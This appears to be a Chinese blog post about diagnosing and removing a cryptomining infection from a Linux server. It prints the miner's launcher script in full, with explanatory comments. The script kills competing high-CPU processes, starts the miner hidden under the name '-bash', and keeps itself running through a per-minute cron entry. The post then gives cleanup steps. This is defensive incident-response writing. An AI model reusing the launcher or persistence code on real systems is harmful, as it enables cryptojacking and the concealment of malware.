背景
今天在做项目的时候,总感觉运行不是很流畅,难道本地服务器也有网络问题?一通操作下来,不出意外,没解决。说来也巧,无意间的一瞥,竟让我发现了问题所在——CPU 满了。这就很不正常了,也没运行什么东西呀,不可能就这么满了。于是我就开始上网搜索,这是什么原因导致的(这就是没完成工作任务的理由?),功夫不负有心人,终于找到了和遇到同样问题的幸运儿,从那篇文章里,我了解到,我的服务器是中了挖矿病毒了。
问题排查
- 首先通过
top
命令查看cpu
占用率高的进程,得到该进程的pid
- 查看该进程是由哪个文件启动的
# 假设 pid 为 1234
ls -l /proc/1234/exe
# 得到如下结果
lrwxrwxrwx 1 git git 0 Jul 29 04:33 /proc/1276757/exe -> /var/tmp/.cache/java
- 根据上面的结果,我们
cd
到/var/tmp/.cache
目录,使用ls
命令查看该目录下有什么内容
cd /var/tmp/.cache
ls
a bash.pid cron.d dir.dir h32 h64 java run upd x
- 然后查看
run
文件
#!/bin/bash
# 下面这条命令的作用是:
# 查找并杀死 CPU 使用率超过 40% 的进程,
# 但排除名为 `xmr-stak` 的进程和所有加载 `ld-linux.so.2` (动态链接器)的进程
# 同时也根据 `bash.pid` 文件(如果存在)中列出的进程 ID 排除额外的进程
# 其中:
# 1. `ps aux`
# 列出系统中当前运行的所有进程的详细信息。
# 2. `grep -vw 'xmr-stak\|ld-linux.so.2'
# 从 `ps aux` 的输出中,排除包含 `xmr-stak` 或 `ld-linux.so.2` 的行。
# `-v` 表示反向选择(即选择不匹配的行)。
# `-w` 表示匹配整个单词。
# `\|` 是正则表达式中的或操作符
# 3. `(test -e bash.pid && grep -vwf bash.pid)`
# 如果 bash.pid 文件存在,则从前面的结果中排除该文件列出的进程 ID。
# `test -e bash.pid` 检查文件是否存在。
# `grep -vwf bash.pid` 中的 -f 则表示从文件中读取模式(即进程 ID),用于排除这些进程
# 4. `awk '{if($3>40.0) print $2}'
# 使用 awk 处理上一步操作,如果第三列(CPU 使用率)大于 40,则打印该行第二列(进程 ID)
# 5. `while read procid; do kill -9 $procid; done`
# 强制杀死所有符合条件的进程
# 6. `2>/dev/null`
# 忽略所有错误消息
ps aux | grep -vw 'xmr-stak\|ld-linux.so.2' | (test -e bash.pid && grep -vwf bash.pid) | awk '{if($3>40.0) print $2}' | while read procid; do kill -9 $procid; done 2>/dev/null
# 获取 CPU 核心数
proc=$(nproc)
# 获取系统的架构(Architecture)信息
ARCH=$(uname -m)
HIDE="-bash"
# 根据系统架构,执行不同的程序
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./java >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./java >>/dev/null &
fi
# 使用 $! 获取上一个后台命令的 PID,并将其赋值给 pid 变量
pid=$!
# 将上面获取到的 pid 加 1 并作为一个新的变量
new_pid=$((pid + 1))
# 将新的 pid 写入 base.pid 文件,并覆盖原有内容
echo $new_pid > bash.pid
从上面的分析不难看出,黑客首先帮我们杀死了那些占用大量 CPU 的进程(人还怪好的嘞)。但实际上,他并不是为了我们,而是要让他的挖矿程序能够更好地运行
问题处理
既然知道问题出在哪里,那就想办法解决它。很明显,我们需要杀死这个进程(还是以 1234 为例)。
kill -9 1234
但是这并没有结束,因为很快它就又卷土重来了,没错,CPU 又满了。到这里就应该意识到一个问题:有定时任务存在。
使用 crontab -e
编辑定时任务,里面有这样的内容:
* * * * * /var/tmp/.cache/upd >/dev/null 2>&1
可以确定,这个定时任务就是挖矿病毒留下来的。我们把这行内容删除,然后再次杀死那个万恶的进程(注意,PID 变了,在杀死之前确定好,别杀错了人进程)
之后我们需要把 .cache 目录(也就是挖矿程序所在的目录)删除,目前来说,这个问题是解决了。
总结
遇到这个问题应该怎么处理,或者说怎么一气呵成地处理?
- 排查问题,首先使用 top 命令查看占用资源的进程
- 然后使用命令 ls -l /proc/
/exe 来查看该进程是由哪个文件启动 - 杀死该进程(可能无效,需要在删除定时任务后再次进行此操作)
- 删除对应的定时任务
- 删除对应的文件,文件夹